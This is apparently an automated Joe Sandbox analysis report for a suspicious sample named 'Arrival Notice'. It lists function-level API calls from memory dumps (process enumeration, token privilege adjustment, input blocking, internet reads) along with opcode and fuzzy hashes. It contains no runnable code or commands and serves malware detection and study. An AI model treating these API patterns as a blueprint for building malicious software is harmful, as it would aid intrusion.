                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: da1a48f3bb720c6b0d4ad77ba99bd88fbd9f57314301d0545feea4f4fabf05e4
                                              • Instruction ID: f8e7b93c5d05f2fc18daf6d74174b1d7e79f7afd0e4ae5168ec2a7d5d8b64d7b
                                              • Opcode Fuzzy Hash: da1a48f3bb720c6b0d4ad77ba99bd88fbd9f57314301d0545feea4f4fabf05e4
                                              • Instruction Fuzzy Hash: 2111B6323026606FD7119F27DC64B2F7B9CFF44722B824429F846D7242DB309905CB95
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00911D88,?), ref: 0094C312
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0094C324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                              • API String ID: 2574300362-1816364905
                                              • Opcode ID: 04bbea7b59cae4539c13c4d4f5039beda11e9184a1bba1acc961bc5eedd94e88
                                              • Instruction ID: 0b1ef49272448a6c3f9056a89884fddd01514564e5fcfcc46e34afae58b85b37
                                              • Opcode Fuzzy Hash: 04bbea7b59cae4539c13c4d4f5039beda11e9184a1bba1acc961bc5eedd94e88
                                              • Instruction Fuzzy Hash: C4E012B4615713CFDB705F26D814E4676D8EF4976AF80C439E899D66A0E770E840CB60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf
                                              • String ID:
                                              • API String ID: 674341424-0
                                              • Opcode ID: dafeb343b29524dfcaff597b66b52a21c8e32115695367e2abaa77e6d613718d
                                              • Instruction ID: b2aa45701d88ed7e9c5f9953320790b0ebe58cf1e6ed23495a45b1996d6211d3
                                              • Opcode Fuzzy Hash: dafeb343b29524dfcaff597b66b52a21c8e32115695367e2abaa77e6d613718d
                                              • Instruction Fuzzy Hash: C32264716083459BC724DF68C885BAAB7E4FF85314F104A2DF99A97391DB30EE44CB92
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0094F151
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0094F15F
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                              • Process32NextW.KERNEL32(00000000,?), ref: 0094F21F
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0094F22E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: a187a467733ce38040a3cd30198d2bda791772834eccd8c9475893ec0d1bfc8d
                                              • Instruction ID: 08d7baee105a5bd811e6b124dd0b1fdf2e37a10c5d942d2478bed047204fe964
                                              • Opcode Fuzzy Hash: a187a467733ce38040a3cd30198d2bda791772834eccd8c9475893ec0d1bfc8d
                                              • Instruction Fuzzy Hash: 5E514971508711AFD310EF24D895E6BBBE8FF98710F14492EF495D72A1EB70A904CB92
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009340D1
                                              • _memset.LIBCMT ref: 009340F2
                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00934144
                                              • CloseHandle.KERNEL32(00000000), ref: 0093414D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                              • String ID:
                                              • API String ID: 1157408455-0
                                              • Opcode ID: c40e67df592eddf810a580ea3b4ee294d4a5cc6604431057ad617d9ad9b034eb
                                              • Instruction ID: 96004b5c32d24a6af1999dddb554284eab8341cef5b755725e5aa192ef6f8188
                                              • Opcode Fuzzy Hash: c40e67df592eddf810a580ea3b4ee294d4a5cc6604431057ad617d9ad9b034eb
                                              • Instruction Fuzzy Hash: DA11E7759013287AE7309BA5AC4DFABBB7CEF44760F1041AAF908E7180D6744E808BA4
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0092EB19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($|
                                              • API String ID: 1659193697-1631851259
                                              • Opcode ID: ca50e3cc06b9417b1752676078357afc4a0e9f396a0d6fe607d2ef8b1c1dd28d
                                              • Instruction ID: b3123e56bac689f4fcf83506996231539b991a8b13d88ba417242597b4a68e86
                                              • Opcode Fuzzy Hash: ca50e3cc06b9417b1752676078357afc4a0e9f396a0d6fe607d2ef8b1c1dd28d
                                              • Instruction Fuzzy Hash: A0324775A007159FDB28CF29D481A6AB7F0FF48320B15C56EE89ADB3A5DB70E941CB40
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 009426D5
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0094270C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: cd29be6df1d3604b401d3749a5b8dc60a26d66ea69a2a0ebd682be0cd641d876
                                              • Instruction ID: d7be72ec2f1b617d375c5e50b1a0aba7bb1d065bde0f22d77ab8d89fcde2c170
                                              • Opcode Fuzzy Hash: cd29be6df1d3604b401d3749a5b8dc60a26d66ea69a2a0ebd682be0cd641d876
                                              • Instruction Fuzzy Hash: 5041E271904309BFEB20DF94CC85EBBB7BCFB40728F50406AFA01A6141EA71AE419B64
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0093B5AE
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0093B608
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0093B655
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: 678b2d036f3d9d448626b78e673b3fe80a3e4f52dbfb40ed59084baa27411e5c
                                              • Instruction ID: 86f31f80d6015790b5689e1a770527982cfe02e234c10e4ab63afcd2ac99e672
                                              • Opcode Fuzzy Hash: 678b2d036f3d9d448626b78e673b3fe80a3e4f52dbfb40ed59084baa27411e5c
                                              • Instruction Fuzzy Hash: FB217135A10618EFCB00EFA5D891EADBBB8FF48314F1480AAE945EB351DB31A915CF51
                                              APIs
                                                • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
                                              • GetLastError.KERNEL32 ref: 00928D47
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: bb86074bda6da0f75c7f32c1958f91afbd70dfa922b0c66973d7e6588f3da0e8
                                              • Instruction ID: d63dff2b57d87f31b1df164f65a50746ca513552b52ef497791bff4706ef4f06
                                              • Opcode Fuzzy Hash: bb86074bda6da0f75c7f32c1958f91afbd70dfa922b0c66973d7e6588f3da0e8
                                              • Instruction Fuzzy Hash: 6E1160B1414209AFD728DF68EC85D6BB7BCFB44721B24852EF45593685EF30A8448B60
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00934C2C
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00934C43
                                              • FreeSid.ADVAPI32(?), ref: 00934C53
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: 54ea15a62d73d5321659e10fba1ee1241ae2d83d8b11b13265e20e551f45f951
                                              • Instruction ID: eaf7e735263a1f50a15d825458d66b3e048c5e608426f96a925e32cc5ca147e0
                                              • Opcode Fuzzy Hash: 54ea15a62d73d5321659e10fba1ee1241ae2d83d8b11b13265e20e551f45f951
                                              • Instruction Fuzzy Hash: E1F04975A1130CBFDF04DFF1DC99AAEBBBCEF08311F0044A9A902E2181E6706A049B50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9cf685d22c431171c11ae8861ccf6fef6a00e006885d21e770bb3dc4293e073
                                              • Instruction ID: a5eaeb5508531c576f4210f8ff0ad30e4f000e805d4fad765b03f238187d0d1c
                                              • Opcode Fuzzy Hash: c9cf685d22c431171c11ae8861ccf6fef6a00e006885d21e770bb3dc4293e073
                                              • Instruction Fuzzy Hash: 15228E74A00219DFDB24EF68C480ABEB7B5FF04310F14866AE956DB351E734A985CB91
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0093C966
                                              • FindClose.KERNEL32(00000000), ref: 0093C996
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: f75aa2e31a99ea19af35574a68cbecafbc62e33fe4116ca9a10c1a8bb70c8756
                                              • Instruction ID: cb094adcd6b06a84d7f78a96056096d1a80072f6667d026b3bc5b104ce052b56
                                              • Opcode Fuzzy Hash: f75aa2e31a99ea19af35574a68cbecafbc62e33fe4116ca9a10c1a8bb70c8756
                                              • Instruction Fuzzy Hash: D01161726146109FD710EF29D855A2AF7E9FF84325F018A1EF9A9D73A1DB34AC00CB81
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0094977D,?,0095FB84,?), ref: 0093A302
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0094977D,?,0095FB84,?), ref: 0093A314
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: d33834564ef357acc022fad35199d3ddf335a2cfec818f7e2efa1005e4998644
                                              • Instruction ID: eacc73c500e6d946b4bb10581e9eca141aec155abb0a657bebeaec6e67dcfd40
                                              • Opcode Fuzzy Hash: d33834564ef357acc022fad35199d3ddf335a2cfec818f7e2efa1005e4998644
                                              • Instruction Fuzzy Hash: 22F0823555932DABEB20AFA4CC48FEA776DFF08761F004266B919D7181DA309940CBA1
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00928851), ref: 00928728
                                              • CloseHandle.KERNEL32(?,?,00928851), ref: 0092873A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: 804ed1e4bf7ffb723fa9149a17fd6d1978072d5c5df01a27c329257144bd2844
                                              • Instruction ID: ed20e07e4eb3e798a069f412269461c3b54e3e363ffecea2f52a0d08241a6a52
                                              • Opcode Fuzzy Hash: 804ed1e4bf7ffb723fa9149a17fd6d1978072d5c5df01a27c329257144bd2844
                                              • Instruction Fuzzy Hash: 1AE0B676015A10EEEB252B65EC09D777BADFB443617248829F596C0470DB72AC90EB10
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008F8F97,?,?,?,00000001), ref: 008FA39A
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008FA3A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 41092d3f23a7102f245b5c6d905953c8fd49fb3f3f3d9e6fca8a7806066e07e3
                                              • Instruction ID: 328893d15005c77b136d064f12a613d9be7f6f304b4378d551a5dc8d77e7cc4e
                                              • Opcode Fuzzy Hash: 41092d3f23a7102f245b5c6d905953c8fd49fb3f3f3d9e6fca8a7806066e07e3
                                              • Instruction Fuzzy Hash: BFB09231068308ABEA002F92ED19B893F68EB44BF3F404020F60D84070CB725450AB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e8b94a26842ac2ad9a5458dee61f853d390ff30dcf2a5be7b993129e41d8a31
                                              • Instruction ID: 709590350ed58bad18c2a9240fa463c04057c4516eabf14f160a8aa9665c4149
                                              • Opcode Fuzzy Hash: 3e8b94a26842ac2ad9a5458dee61f853d390ff30dcf2a5be7b993129e41d8a31
                                              • Instruction Fuzzy Hash: CD32F222D7DF194DD7239634D832335A248EFB73D8F15D73BE929B5AA6EB2884835100
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0240142389a6a5bcebd9486c48166dffa7144921f5c3818cdf44f60359826ba8
                                              • Instruction ID: 5d555873f34a24d23827fe7ce8f094e70f05a1167bae86e91c01038c09b807b4
                                              • Opcode Fuzzy Hash: 0240142389a6a5bcebd9486c48166dffa7144921f5c3818cdf44f60359826ba8
                                              • Instruction Fuzzy Hash: 2FB11120D3AF414DD32396398835336B64CAFBB2C5F51D71BFC2674E62EB6285835541
                                              APIs
                                              • __time64.LIBCMT ref: 00938B25
                                                • Part of subcall function 008F543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009391F8,00000000,?,?,?,?,009393A9,00000000,?), ref: 008F5443
                                                • Part of subcall function 008F543A: __aulldiv.LIBCMT ref: 008F5463
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Time$FileSystem__aulldiv__time64
                                              • String ID:
                                              • API String ID: 2893107130-0
                                              • Opcode ID: 1de603937128a76839698961b8bdca4904947f52c36ceffd0ae88330bc798c08
                                              • Instruction ID: c344142aa82e183db6a4fe994dc61dc39e08f9d43e3ac80ce94af29b7a97efdd
                                              • Opcode Fuzzy Hash: 1de603937128a76839698961b8bdca4904947f52c36ceffd0ae88330bc798c08
                                              • Instruction Fuzzy Hash: E0210272638610CBC729CF29D441A52F3E1EBA4311F288E2DE0E5CB2D0CE30B905DB94
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00944218
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: 28356779bfdb7bf5f8bd16c562a11420e78c3bb6fce1c745a3eacbe7ba4a73ef
                                              • Instruction ID: 68177d9baca06afde06d9c37d51e8935176d21a14636b41c991caf48dbcb6693
                                              • Opcode Fuzzy Hash: 28356779bfdb7bf5f8bd16c562a11420e78c3bb6fce1c745a3eacbe7ba4a73ef
